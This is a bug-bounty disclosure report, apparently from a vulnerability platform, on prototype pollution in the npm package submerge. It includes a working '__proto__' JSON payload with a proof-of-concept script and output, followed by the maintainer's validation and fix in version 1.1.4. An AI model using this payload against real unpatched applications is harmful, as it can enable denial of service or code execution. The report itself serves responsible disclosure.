Prototype pollution in konfirm/node-submerge


Reported on

Aug 21st 2022


submerge is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.

Proof of Concept

Create the following PoC file:

// poc.js
var merge = require("submerge")
let obj = {}
let payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}')
console.log("Before : " + {}.polluted);
merge(obj, payload);
console.log("After : " + {}.polluted);

Execute the following commands in another terminal:

npm i submerge  # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted


May result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.

We are processing your report and will contact the konfirm/node-submerge team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the konfirm/node-submerge team and are waiting to hear back a year ago
konfirm/node-submerge maintainer gave praise a year ago
Thank you for bringing this issue to my attention. I have used the proof of concept code as the basis for a test scenario, was able to reproduce your finding and then resolve the issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
konfirm/node-submerge maintainer validated this vulnerability a year ago
waelahmed-dev has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
konfirm/node-submerge maintainer marked this as fixed in 1.1.4 with commit c2d67f a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
a year ago


I'm glad that I could help in making your repo more secure Isn't there any bounty for this report? or at least a CVE? of course if it's possible for you, I would be really grateful

to join this conversation